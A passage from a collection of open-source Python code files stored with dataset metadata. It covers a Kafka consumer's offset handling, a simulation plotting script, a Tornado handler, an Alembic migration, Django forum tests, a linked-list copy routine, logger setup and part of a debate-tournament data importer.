assigned partitions with last offsets\n \"\"\"\n last_offsets: Dict[str, BasePositioning] = dict()\n self.logger.debug('Get last offsets')\n for tp in self._kafka_consumer.assignment():\n try:\n offset = (await self._kafka_consumer.end_offsets([tp]))[tp]\n last_offsets[KafkaPositioning.make_class_assignment_key(tp.topic, tp.partition)] = \\\n KafkaPositioning(tp.topic, tp.partition, offset)\n except KafkaTimeoutError as err:\n self.logger.exception('%s', err.__str__())\n raise ConsumerKafkaTimeoutError\n except UnsupportedVersionError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n return last_offsets\n\n async def load_offsets(self, mod: str = 'earliest') -> None:\n \"\"\"\n This method was call before consume topics, assign position to consumer\n\n Args:\n mod: Start position of consumer (earliest, latest, committed)\n\n Returns:\n None\n \"\"\"\n self.logger.debug('Load offset mod : %s', mod)\n if not self._running:\n await self.start_consumer()\n\n if mod == 'latest':\n await self.seek_to_end()\n elif mod == 'earliest':\n await self.seek_to_beginning()\n elif mod == 'committed':\n await self.seek_to_last_commit()\n else:\n raise KafkaConsumerError\n\n self.__current_offsets = await self.get_current_offsets()\n self.__last_offsets = await self.get_last_offsets()\n\n if self._group_id is not None:\n self.__last_committed_offsets = await self.get_last_committed_offsets()\n for key, kafka_positioning in self.__last_committed_offsets.items():\n if kafka_positioning.get_current_offset() is None:\n self.logger.debug('Seek to beginning, no committed offsets was found')\n await self.seek_to_beginning(kafka_positioning)\n\n async def debug_print_all_msg(self):\n \"\"\"\n Debug method, useful for display all msg was contained in assigned topic/partitions\n\n Returns:\n None\n \"\"\"\n while True:\n message = await self._kafka_consumer.getone()\n self.logger.info('----------------------------------------------------------------------------------------')\n self.logger.info('Topic %s, Partition %s, Offset %s, Key %s, Value %s, Headers %s',\n message.topic, message.partition, message.offset, message.key, message.value,\n message.headers)\n self.logger.info('----------------------------------------------------------------------------------------')\n\n async def listen_records(self, mod: str = 'earliest') -> None:\n \"\"\"\n Listens records from assigned topic / partitions\n\n Args:\n mod: Start position of consumer (earliest, latest, committed)\n\n Returns:\n None\n \"\"\"\n if not self._running:\n await self.load_offsets(mod)\n\n self.pprint_consumer_offsets()\n\n async for msg in self._kafka_consumer:\n # Debug Display\n self.logger.debug(\"---------------------------------------------------------------------------------\")\n self.logger.debug('New Message on consumer %s, Topic %s, Partition %s, Offset %s, '\n 'Key %s, Value %s, Headers %s', self._client_id, msg.topic, msg.partition,\n msg.offset, msg.key, msg.value, msg.headers)\n self.pprint_consumer_offsets()\n self.logger.debug(\"---------------------------------------------------------------------------------\")\n\n key = KafkaPositioning.make_class_assignment_key(msg.topic, msg.partition)\n self.__current_offsets[key].set_current_offset(msg.offset)\n if self._transactional_manager is not None:\n self._transactional_manager.set_ctx(KafkaTransactionContext(msg.topic, msg.partition,\n msg.offset, self._group_id))\n # self.last_offsets = await self.get_last_offsets()\n\n sleep_duration_in_ms = self._retry_interval\n for retries 
in range(0, self._max_retries):\n try:\n record_class = msg.value['record_class']\n handler_class = msg.value['handler_class']\n\n if handler_class is None:\n self.logger.debug('Empty handler')\n break\n\n self.logger.debug('Event name : %s Event content :\\n%s',\n record_class.event_name(), record_class.__dict__)\n\n # Calls handle if event is instance BaseHandler\n if isinstance(handler_class, BaseEventHandler):\n transactional = await handler_class.handle(event=record_class)\n elif isinstance(handler_class, BaseCommandHandler):\n transactional = await handler_class.execute(event=record_class)\n elif isinstance(handler_class, BaseResultHandler):\n transactional = await handler_class.on_result(event=record_class)\n else:\n # Otherwise raise KafkaConsumerUnknownHandler\n raise UnknownHandler\n\n # If result is none (no transactional process), check if consumer has an\n # group_id (mandatory to commit in Kafka)\n if transactional is None and self._group_id is not None:\n # Check if next commit was possible (Kafka offset)\n if self.__last_committed_offsets[key] is None or \\\n self.__last_committed_offsets[key].get_current_offset() <= \\\n self.__current_offsets[key].get_current_offset():\n\n self.logger.debug('Commit msg %s in topic %s partition %s offset %s',\n record_class.event_name(), msg.topic, msg.partition,\n self.__current_offsets[key].get_current_offset() + 1)\n tp = self.__current_offsets[key].to_topics_partition()\n await self._kafka_consumer.commit(\n {tp: self.__current_offsets[key].get_current_offset() + 1})\n self.__last_committed_offsets[key].set_current_offset(msg.offset + 1)\n\n # Transactional process no commit\n elif transactional:\n self.logger.debug('Transaction end')\n self.__current_offsets = await self.get_current_offsets()\n self.__last_committed_offsets = await self.get_last_committed_offsets()\n # Otherwise raise KafkaConsumerUnknownHandlerReturn\n elif transactional is None and self._group_id is None:\n pass\n else:\n raise UnknownHandlerReturn\n\n # Break if everything was successfully processed\n break\n except UninitializedStore as err:\n self.logger.exception('%s', err.__str__())\n retries = 0\n await asyncio.sleep(10)\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n except ValueError as err:\n self.logger.exception('%s', err.__str__())\n raise OffsetError\n except CommitFailedError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n except (KafkaError, HandlerException) as err:\n self.logger.exception('%s', err.__str__())\n sleep_duration_in_s = int(sleep_duration_in_ms / 1000)\n await asyncio.sleep(sleep_duration_in_s)\n sleep_duration_in_ms = sleep_duration_in_ms * self._retry_backoff_coeff\n if retries not in range(0, self._max_retries):\n await self.stop_consumer()\n self.logger.error('Max retries, close consumer and exit')\n exit(1)\n\n async def _refresh_offsets(self) -> None:\n \"\"\"\n This method refresh __current_offsets / __last_offsets / __last_committed_offsets\n\n Returns:\n None\n \"\"\"\n self.logger.debug('Call refresh offsets')\n\n self.__current_offsets = await self.get_current_offsets()\n self.__last_offsets = await self.get_last_offsets()\n\n if self._group_id is not None:\n self.__last_committed_offsets = await self.get_last_committed_offsets()\n else:\n raise IllegalOperation\n\n async def check_if_store_is_ready(self) -> None:\n \"\"\" If store is ready consumer set store initialize flag to true\n\n Returns:\n None\n \"\"\"\n\n # Check if local store is 
initialize\n self.logger.info('Started check_if_store_is_ready')\n if not self._store_manager.get_local_store().get_persistency().is_initialize():\n key = KafkaPositioning.make_class_assignment_key(self._store_manager.get_topic_store(),\n self._client.cur_instance)\n if self.__last_offsets[key].get_current_offset() == 0:\n self._store_manager.__getattribute__('_initialize_local_store').__call__()\n self.logger.info('Local store was initialized')\n elif self.__current_offsets[key].get_current_offset() == self.__last_offsets[key].get_current_offset():\n self._store_manager.__getattribute__('_initialize_local_store').__call__()\n self.logger.info('Local store was initialized')\n\n # Check if global store is initialize\n if not self._store_manager.get_global_store().get_persistency().is_initialize():\n for key, positioning in self.__last_offsets.items():\n if self._client.cur_instance != positioning.get_partition():\n if positioning.get_current_offset() == 0:\n continue\n elif positioning.get_current_offset() == self.__current_offsets[key].get_current_offset():\n continue\n else:\n break\n else:\n self._store_manager.__getattribute__('_initialize_global_store').__call__()\n self.logger.info('Global store was initialized')\n\n async def listen_store_records(self, rebuild: bool = False) -> None:\n \"\"\"\n Listens events for store construction\n\n Args:\n rebuild (bool): if true consumer seek to fist offset for rebuild own state\n\n Returns:\n None\n \"\"\"\n if self._store_manager is None:\n raise KeyError\n\n self.logger.info('Start listen store records')\n\n await self.start_consumer()\n\n await self._store_manager.__getattribute__('_initialize_stores').__call__()\n\n if not self._running:\n raise KafkaConsumerError('Fail to start tongaConsumer', 500)\n\n # Check if store is ready\n await self._refresh_offsets()\n\n await self.check_if_store_is_ready()\n self.pprint_consumer_offsets()\n\n async for msg in self._kafka_consumer:\n positioning_key = KafkaPositioning.make_class_assignment_key(msg.topic, msg.partition)\n self.__current_offsets[positioning_key].set_current_offset(msg.offset)\n\n # Debug Display\n self.logger.debug(\"---------------------------------------------------------------------------------\")\n self.logger.debug('New Message on consumer %s, Topic %s, Partition %s, Offset %s, '\n 'Key %s, Value %s, Headers %s', self._client_id, msg.topic, msg.partition,\n msg.offset, msg.key, msg.value, msg.headers)\n self.pprint_consumer_offsets()\n self.logger.debug(\"---------------------------------------------------------------------------------\")\n\n # Check if store is ready\n await self.check_if_store_is_ready()\n\n sleep_duration_in_ms = self._retry_interval\n for retries in range(0, self._max_retries):\n try:\n record_class: BaseRecord = msg.value['record_class']\n handler_class: BaseStoreRecordHandler = msg.value['handler_class']\n\n self.logger.debug('Store event name : %s\\nEvent content :\\n%s\\n',\n record_class.event_name(), record_class.__dict__)\n\n positioning = self.__current_offsets[positioning_key]\n if self._client.cur_instance == msg.partition:\n # Calls local_state_handler if event is instance BaseStorageBuilder\n if rebuild and not self._store_manager.get_local_store().get_persistency().is_initialize():\n if isinstance(record_class, StoreRecord):\n self.logger.debug('Call local_store_handler')\n await handler_class.local_store_handler(store_record=record_class,\n positioning=positioning)\n else:\n raise UnknownStoreRecordHandler\n elif self._client.cur_instance != 
msg.partition:\n if isinstance(record_class, StoreRecord):\n self.logger.debug('Call global_store_handler')\n await handler_class.global_store_handler(store_record=record_class, positioning=positioning)\n else:\n raise UnknownStoreRecordHandler\n\n # Check if store is ready\n await self.check_if_store_is_ready()\n\n # Break if everything was successfully processed\n break\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n except ValueError as err:\n self.logger.exception('%s', err.__str__())\n raise OffsetError\n except CommitFailedError as err:\n self.logger.exception('%s', err.__str__())\n raise err\n except (KafkaError, HandlerException) as err:\n self.logger.exception('%s', err.__str__())\n sleep_duration_in_s = int(sleep_duration_in_ms / 1000)\n await asyncio.sleep(sleep_duration_in_s)\n sleep_duration_in_ms = sleep_duration_in_ms * self._retry_backoff_coeff\n if retries not in range(0, self._max_retries):\n await self.stop_consumer()\n self.logger.error('Max retries, close consumer and exit')\n exit(1)\n\n def is_lag(self) -> bool:\n \"\"\"\n Consumer has lag ?\n\n Returns:\n bool: True if consumer is lagging otherwise return false and consumer is up to date\n \"\"\"\n if self.__last_offsets == self.__current_offsets:\n return False\n return True\n\n async def seek_to_beginning(self, positioning: BasePositioning = None) -> None:\n \"\"\"\n Seek to fist offset, mod 'earliest'.\n If positioning is None consumer will seek all assigned partition to beginning\n\n Args:\n positioning (BasePositioning): Positioning class contain (topic name / partition number)\n\n Returns:\n None\n \"\"\"\n if not self._running:\n await self.start_consumer()\n if positioning is not None:\n try:\n await self._kafka_consumer.seek_to_beginning(positioning.to_topics_partition())\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n except TypeError as err:\n self.logger.exception('%s', err.__str__())\n raise TopicPartitionError\n self.logger.debug('Seek to beginning for topic : %s, partition : %s', positioning.get_partition(),\n positioning.get_partition())\n else:\n try:\n await self._kafka_consumer.seek_to_beginning()\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n self.logger.debug('Seek to beginning for all topics & partitions')\n\n async def seek_to_end(self, positioning: BasePositioning = None) -> None:\n \"\"\"\n Seek to latest offset, mod 'latest'.\n If positioning is None consumer will seek all assigned partition to end\n\n Args:\n positioning (BasePositioning): Positioning class contain (topic name / partition number)\n\n Returns:\n None\n \"\"\"\n if not self._running:\n await self.start_consumer()\n if positioning is not None:\n try:\n await self._kafka_consumer.seek_to_end(positioning.to_topics_partition())\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n except TypeError as err:\n self.logger.exception('%s', err.__str__())\n raise TopicPartitionError\n self.logger.debug('Seek to end for topic : %s, partition : %s', positioning.get_topics(),\n positioning.get_partition())\n else:\n try:\n await self._kafka_consumer.seek_to_end()\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n self.logger.debug('Seek to end for all topics & partitions')\n\n async def seek_to_last_commit(self, positioning: BasePositioning 
= None) -> None:\n \"\"\"\n Seek to last committed offsets, mod 'committed'\n If positioning is None consumer will seek all assigned partition to last committed offset\n\n Args:\n positioning (BasePositioning): Positioning class contain (topic name / partition number / offset number)\n\n Returns:\n None\n \"\"\"\n if self._group_id is None:\n raise IllegalOperation\n if not self._running:\n await self.start_consumer()\n if positioning:\n try:\n await self._kafka_consumer.seek_to_committed(positioning.to_topics_partition())\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n except TypeError as err:\n self.logger.exception('%s', err.__str__())\n raise TopicPartitionError\n self.logger.debug('Seek to last committed for topic : %s, partition : %s', positioning.get_topics(),\n positioning.get_partition())\n else:\n try:\n await self._kafka_consumer.seek_to_committed()\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n self.logger.debug('Seek to last committed for all topics & partitions')\n\n async def seek_custom(self, positioning: BasePositioning) -> None:\n \"\"\"\n Seek to custom offsets\n\n Args:\n positioning (BasePositioning): Positioning class contain (topic name / partition number / offset number)\n\n Returns:\n None\n \"\"\"\n if not self._running:\n await self.start_consumer()\n if positioning is not None:\n try:\n await self._kafka_consumer.seek(positioning.to_topics_partition(), positioning.get_current_offset())\n except ValueError as err:\n self.logger.exception('%s', err.__str__())\n raise OffsetError\n except TypeError as err:\n self.logger.exception('%s', err.__str__())\n raise TopicPartitionError\n except IllegalStateError as err:\n self.logger.exception('%s', err.__str__())\n raise NoPartitionAssigned\n self.logger.debug('Custom seek for topic : %s, partition : %s, offset : %s',\n positioning.get_topics(), positioning.get_partition(), positioning.get_current_offset())\n else:\n raise KafkaConsumerError\n\n async def _make_manual_commit(self, to_commit: List[BasePositioning]):\n commits = {}\n for positioning in to_commit:\n commits[positioning.to_topics_partition()] = positioning.get_current_offset()\n\n await self._kafka_consumer.commit(commits)\n\n async def subscriptions(self) -> frozenset:\n \"\"\"\n Get list of subscribed topic\n\n Returns:\n frozenset: List of subscribed topic\n\n \"\"\"\n if not self._running:\n await self.start_consumer()\n return self._kafka_consumer.subscription()\n\n def pprint_consumer_offsets(self) -> None:\n \"\"\"\n Debug tool, print all consumer position\n\n Returns:\n None\n \"\"\"\n self.logger.debug('Client ID = %s', self._client_id)\n\n self.logger.debug('Current Offset = %s', [positioning.pprint() for key, positioning in\n self.__current_offsets.items()])\n self.logger.debug('Last Offset = %s', [positioning.pprint() for key, positioning in\n self.__last_offsets.items()])\n\n self.logger.debug('Last committed offset = %s', [positioning.pprint() for key, positioning in\n self.__last_committed_offsets.items()])\n\n def get_consumer(self) -> AIOKafkaConsumer:\n \"\"\"\n Get aiokafka consumer\n\n Returns:\n AIOKafkaConsumer: Current instance of AIOKafkaConsumer\n \"\"\"\n return self._kafka_consumer\n\n def get_offset_bundle(self) -> Dict[str, Dict[str, BasePositioning]]:\n \"\"\"\n Return a bundle with each assigned assigned topic/partition with current, latest, last committed\n topic/partition as dict\n\n Returns:\n Dict[str, 
Dict[TopicPartition, int]]: Contains current_offset / last_offset / last_committed_offset\n \"\"\"\n return {\n 'current_offset': self.__current_offsets.copy(),\n 'last_offset': self.__last_offsets.copy(),\n 'last_committed_offset': self.__last_committed_offsets.copy()\n }\n\n def get_current_offset(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Return current offset of each assigned topic/partition\n\n Returns:\n Dict[str, BasePositioning]: Dict contains current offset of each assigned partition\n \"\"\"\n return self.__current_offsets.copy()\n\n def get_last_offset(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Return last offset of each assigned topic/partition\n\n Returns:\n Dict[str, BasePositioning]: Dict contains latest offset of each assigned partition\n \"\"\"\n return self.__last_offsets.copy()\n\n def get_last_committed_offset(self) -> Dict[str, BasePositioning]:\n \"\"\"\n Return last committed offset of each assigned topic/partition\n\n Returns:\n Dict[str, BasePositioning]: Dict contains last committed offset of each assigned partition\n \"\"\"\n return self.__last_committed_offsets.copy()\n","sub_path":"tonga/services/consumer/kafka_consumer.py","file_name":"kafka_consumer.py","file_ext":"py","file_size_in_byte":37718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"337777206","text":"\"\"\"\nUseful for visualizing how steady state is reached on a cycle-per-cycle basis.\nAuthor: Natalia Spitha\n\"\"\"\nimport time\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom KinetiKit import sim, artists\nfrom KinetiKit import kit as kin_kit\n\nfrom KinetiKit.units import ns, ps\n\nplot_output = False\n\nvar_values = [1,2,3,4,5,6,7, 8, 9, 10, 11, 12] # values that the varied parameter will take\nirf_args = {'irf_type': 'GaussDiff',\n 'weighted' : True,\n 'fwhm': 30 * ps,\n 'tau': 700 *ps,\n 'b': 0.1,\n 'tau_wt': 60 *ps\n } \n\nto = sim.time.linear(period=12.5*ns, N = 1000, subsample=1)\ndtime = to['array'][::to['subsample']]\n\n# --- Simulation Params\nparams = {\n 'k_ann':2e8,\n 'k_dis': 1e9,\n 'k_rec': 1e4,\n 'cs': 0.2,\n}\nsystem = sim.systems.MonoRecX(**params)\nexcitation = sim.lib.Excitation()\n\n\nplt.figure()\nax = plt.subplot(111)\nax2 = ax.twinx()\nalphas = np.linspace(0.1,1,num=len(var_values))\nfor i, var_val in enumerate(var_values):\n excitation = excitation.updated_with(numcycles=var_val)\n transient, converged = sim.lib.refined_simulation(system, to, \n excitation,\n N_coarse=500,\n doubleSearch=False)\n transient = kin_kit.roll_by_array_shift(transient, dtime, 0.3*ns)\n\n rpl = system.PLsig(transient)\n \n pl = sim.lib.convolve_irf(rpl, dtime, irf_args)\n \n xs = transient[0]; es = transient[1]; hs = transient[2]\n \n xs /= 1e-14 #divide by excitation volume\n es /= 1e-14\n hs /= 1e-14\n\n alpha = alphas[i]\n ax.plot(dtime/ns, xs, color='blue', alpha=alpha, label=var_val)\n ax2.plot(dtime/ns, es, color='red', alpha = alpha,)\n\nif plot_output:\n ax.plot(dtime/ns, kin_kit.normalized(rpl), ':', color='black', linewidth=2, alpha=0.7, label='PL_signal')\n ax.plot(dtime/ns, kin_kit.normalized(pl), color='orange', linewidth=8, alpha=0.4, label='convolved PL')\n\nax.legend(loc=1)\nplt.title('Reaching Steady State Visualization')\nax.set_xlabel('Time (ns)')\nax.set_ylabel('Norm. 
X population', color='blue')\nax2.set_ylabel('Norm E/H population', color='red')\nax.set_yscale('log'); ax2.set_yscale('log'); ax2.set_xscale('log')\n# ax.set_ylim(0.0, 1.1)\n# ax2.set_ylim(0.0,1.1)\nplt.xlim(0.2, 12.5)\nplt.legend(title='cycle')\nplt.tight_layout()\n \nplt.show()\n","sub_path":"examples/VisualizeSteadyState.py","file_name":"VisualizeSteadyState.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"475820657","text":"#coding=utf-8\n\nimport tornado.web\nfrom bin import base\nfrom handler.basehandler import BaseHandler\n\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\ndef get_skill_info(user_id):\n \"\"\"返回该用户专业技能的相关信息\"\"\"\n from optsql.searchMySQL import search_oneuser_allinfo\n user_skill_info = search_oneuser_allinfo(table=\"skill\", user_id=user_id) #查询该用户的所有技能信息\n user_skill_info = base.delete_userid_statement(user_skill_info)\n user_skill_info = base.delete_createtime_statement(user_skill_info)\n return user_skill_info\n\n\nclass ShowSkillHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n user_id = base.get_id_name(self.current_user)[0]\n user_skill_info = get_skill_info(user_id=user_id) #查询该用户专业技能的所有信息\n self.write(base.get_json(user_skill_info))","sub_path":"handler/skill/showskill.py","file_name":"showskill.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"17190613","text":"\"\"\"empty message\n\nRevision ID: 0004_create_jobs\nRevises: 0003_create_tokens\nCreate Date: 2016-01-15 10:12:02.381160\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '0004_create_jobs'\ndown_revision = '0003_create_tokens'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('jobs',\n sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column('original_file_name', sa.String(), nullable=False),\n sa.Column('service_id', sa.BigInteger(), nullable=True),\n sa.Column('template_id', sa.BigInteger(), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['service_id'], ['services.id'], ),\n sa.ForeignKeyConstraint(['template_id'], ['templates.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_jobs_service_id'), 'jobs', ['service_id'], unique=False)\n op.create_index(op.f('ix_jobs_template_id'), 'jobs', ['template_id'], unique=False)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(op.f('ix_jobs_template_id'), table_name='jobs')\n op.drop_index(op.f('ix_jobs_service_id'), table_name='jobs')\n op.drop_table('jobs')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/0004_create_jobs.py","file_name":"0004_create_jobs.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"638937938","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport pdb\n\nfrom django.test import TestCase\nfrom forum.models import SubCategory, Thread, Post\nfrom django.contrib.auth.models import User\nfrom django.db import transaction\nfrom random import randint\n\n# Create your tests here.\n\n\nclass ViewTests(TestCase):\n \"\"\"\n Test that all the views return 200 code.\n \"\"\"\n\n fixtures = [\"forum_testdata.json\", \"forum_users.json\"]\n\n def test_simple_urls(self):\n \"Test urls that simply need to render a successful response.\"\n\n urls = [\n \"/forum/\",\n \"/forum/login/\",\n \"/forum/register/\",\n \"/forum/rules/\",\n ]\n\n for url in urls:\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n\n def test_subcat(self):\n \"Test that a random subcategory returns a response.\"\n\n subcats = [s for s in SubCategory.objects.all()]\n i = randint(0, len(subcats) - 1)\n subcat = subcats[i]\n r = self.client.get(\"/forum/{}/\".format(str(subcat.id)))\n self.assertEqual(r.status_code, 200)\n\n def test_thread(self):\n \"Test that a random thread returns a response.\"\n\n threads = Thread.objects.all()\n i = randint(0, len(threads) - 1)\n thread = threads[i]\n r = self.client.get(\"/forum/{}/{}/\".format(str(thread.subcat.id), str(thread.id)))\n self.assertEqual(r.status_code, 200)\n\n def test_search(self):\n \"Test that the search form and a search query returns a response.\"\n\n r = self.client.get(\"/forum/search/\")\n self.assertEqual(r.status_code, 200)\n self.assertTrue(\"query\" not in r.context)\n query = \"Lorem+Ipsum\"\n r = self.client.get(\"/forum/search/?q={}\".format(query))\n self.assertEqual(r.status_code, 200)\n self.assertTrue(\"object_list\" in r.context)\n self.assertTrue(\"query\" in r.context)\n\nclass TestAuthenitcation(TestCase):\n \"\"\"\n Test all functionality related to users and authentication.\n\n Tests user creation, user login, user profile, creation of threads, \n creation of posts, editing of posts, and deletes the user afterword.\n \"\"\"\n\n fixtures = [\"forum_testdata.json\", \"forum_users.json\"]\n\n def setUp(self):\n \"Log in user and set fields for accessing thread and post.\"\n\n self.username = \"tempusername\"\n self.password = \"tempassword\"\n self.thread_name = \"tempthread\"\n self.post_content = \"temppost\"\n User.objects.create_user(username=self.username, password=self.password)\n u = User.objects.get(username=self.username)\n login = self.client.login(username=self.username, password=self.password)\n\n def test_thread_and_post(self):\n \"Test creation of thread and post.\"\n\n s = SubCategory.objects.first()\n with transaction.atomic():\n Thread.objects.create(name=self.thread_name, subcat=s)\n t = Thread.objects.get(name=self.thread_name)\n self.assertEqual(t.name, self.thread_name)\n\n with transaction.atomic():\n a = User.objects.get(username=self.username)\n Post.objects.create(content=self.post_content, thread=t, author=a)\n p = Post.objects.get(content=self.post_content)\n self.assertEqual(p.content, self.post_content)\n p.content = \"New Content\"\n 
self.assertEqual(p.content, \"New Content\")\n\n def test_profile(self):\n \"Test that profile renders a successful response.\"\n\n profile_r = self.client.get(\"/forum/profile/\")\n self.assertEqual(profile_r.status_code, 200)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"184230163","text":"def copyRandomList(self, head):\n \"\"\"\n :type head: RandomListNode\n :rtype: RandomListNode\n \"\"\"\n node_map = {}\n if head is None: return None\n new_head = RandomListNode(head.label)\n ptr = head.next\n new_ptr = new_head\n node_map.update({head: new_head})\n # Set only next nodes\n while ptr is not None:\n new_node = RandomListNode(ptr.label)\n new_ptr.next = new_node\n new_ptr = new_node\n node_map.update({ptr: new_ptr})\n ptr = ptr.next\n # Set random pointers\n ptr = head\n new_ptr = new_head\n while ptr is not None:\n if ptr.random is not None:\n new_ptr.random = node_map[ptr.random]\n ptr = ptr.next\n new_ptr = new_ptr.next\n return new_head\n","sub_path":"Linked_Lists/Deep copy.py","file_name":"Deep copy.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"299716671","text":"#!/usr/bin/python3m\r\nimport logging\r\nimport sys\r\n\r\ndef create_logger():\r\n logger = logging.getLogger('bbqpi_logger')\r\n logger.setLevel(logging.DEBUG)\r\n\r\n fh = logging.FileHandler('bbqpi.log', mode='w')\r\n fh.setLevel(logging.DEBUG)\r\n\r\n ch = logging.StreamHandler(stream=sys.stdout)\r\n ch.setLevel(logging.DEBUG)\r\n\r\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(funcName)s %(message)s',datefmt='%Y-%m-%d %H:%M:%S')\r\n fh.setFormatter(formatter)\r\n ch.setFormatter(formatter)\r\n\r\n logger.addHandler(ch)\r\n logger.addHandler(fh)\r\n return logger\r\n","sub_path":"python/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"575048905","text":"from django.db.models import Q\n\nimport adjallocation.models as am\nimport adjfeedback.models as fm\nimport breakqual.models as bm\nimport tournaments.models as tm\nimport participants.models as pm\nimport venues.models as vm\nfrom participants.emoji import set_emoji\n\nfrom .base import BaseTournamentDataImporter, make_interpreter, make_lookup\n\n\nclass BootsTournamentDataImporter(BaseTournamentDataImporter):\n \"\"\"Boots: Added for British Parliamentary convenience.\"\"\"\n\n lookup_round_stage = make_lookup(\"round stage\", {\n (\"preliminary\", \"p\"): tm.Round.STAGE_PRELIMINARY,\n (\"elimination\", \"break\", \"e\", \"b\"): tm.Round.STAGE_ELIMINATION,\n })\n\n lookup_draw_type = make_lookup(\"draw type\", {\n (\"random\", \"r\"): tm.Round.DRAW_RANDOM,\n (\"manual\", \"m\"): tm.Round.DRAW_MANUAL,\n (\"round robin\", \"d\"): tm.Round.DRAW_ROUNDROBIN,\n (\"power paired\", \"p\"): tm.Round.DRAW_POWERPAIRED,\n (\"elimination\", \"break\", \"e\", \"b\"): tm.Round.DRAW_ELIMINATION,\n })\n\n lookup_gender = make_lookup(\"gender\", {\n (\"male\", \"m\"): pm.Person.GENDER_MALE,\n (\"female\", \"f\"): pm.Person.GENDER_FEMALE,\n (\"other\", \"o\"): pm.Person.GENDER_OTHER,\n })\n\n order = [\n 'break_categories',\n 'rounds',\n 'institutions',\n 'speaker_categories',\n 'adjudicators',\n 'scores',\n 'teams',\n 'venues',\n 'team_conflicts',\n 'institution_conflicts',\n 
'team_institution_conflicts',\n ]\n\n def import_rounds(self, f):\n round_interpreter = make_interpreter(\n tournament=self.tournament,\n stage=self.lookup_round_stage,\n draw_type=self.lookup_draw_type,\n break_category=lambda x: bm.BreakCategory.objects.get(slug=x, tournament=self.tournament)\n )\n self._import(f, tm.Round, round_interpreter)\n\n # Set the round with the lowest known seqno to be the current round.\n self.tournament.current_round = self.tournament.round_set.order_by('seq').first()\n self.tournament.save()\n\n def import_institutions(self, f):\n self._import(f, pm.Institution)\n\n def import_break_categories(self, f):\n interpreter = make_interpreter(tournament=self.tournament)\n self._import(f, bm.BreakCategory, interpreter)\n\n def import_speaker_categories(self, f):\n interpreter = make_interpreter(tournament=self.tournament)\n self._import(f, pm.SpeakerCategory, interpreter)\n\n def import_adjudicators(self, f):\n interpreter = make_interpreter(\n institution=pm.Institution.objects.lookup,\n tournament=self.tournament,\n gender=self.lookup_gender,\n )\n adjudicators = self._import(f, pm.Adjudicator, interpreter)\n\n def own_institution_conflict_interpreter(lineno, line):\n adjudicator = adjudicators[lineno]\n if adjudicator.institution is not None:\n return {\n 'adjudicator': adjudicator,\n 'institution': adjudicator.institution,\n }\n self._import(f, am.AdjudicatorInstitutionConflict, own_institution_conflict_interpreter)\n\n def import_scores(self, f):\n # The base class can only create instances, it can't update existing ones.\n # To get around this, we create the histories first, and then set the scores\n # on adjudicators.\n interpreter = make_interpreter(\n round=None,\n adjudicator=lambda x: pm.Adjudicator.objects.get(\n Q(tournament=self.tournament) | Q(tournament__isnull=True), name=x),\n )\n histories = self._import(f, fm.AdjudicatorTestScoreHistory, interpreter)\n\n for history in histories.values():\n history.adjudicator.test_score = history.score\n history.adjudicator.save()\n\n def import_teams(self, f):\n speaker_fields = ['name', 'email', 'category', 'gender']\n\n team_interpreter_part = make_interpreter(\n tournament=self.tournament,\n institution=pm.Institution.objects.lookup,\n DELETE=['speaker%d_%s' % (i, field) for i in [1, 2] for field in speaker_fields] + ['break_category']\n )\n\n def team_interpreter(lineno, line):\n line = team_interpreter_part(lineno, line)\n if not line.get('short_reference'):\n line['short_reference'] = line['reference'][:34]\n return line\n teams = self._import(f, pm.Team, team_interpreter)\n set_emoji(teams.values(), self.tournament)\n\n def break_category_interpreter(lineno, line):\n if line.get('break_category'):\n for category in line['break_category'].split('/'):\n yield {\n 'team': teams[lineno],\n 'breakcategory': 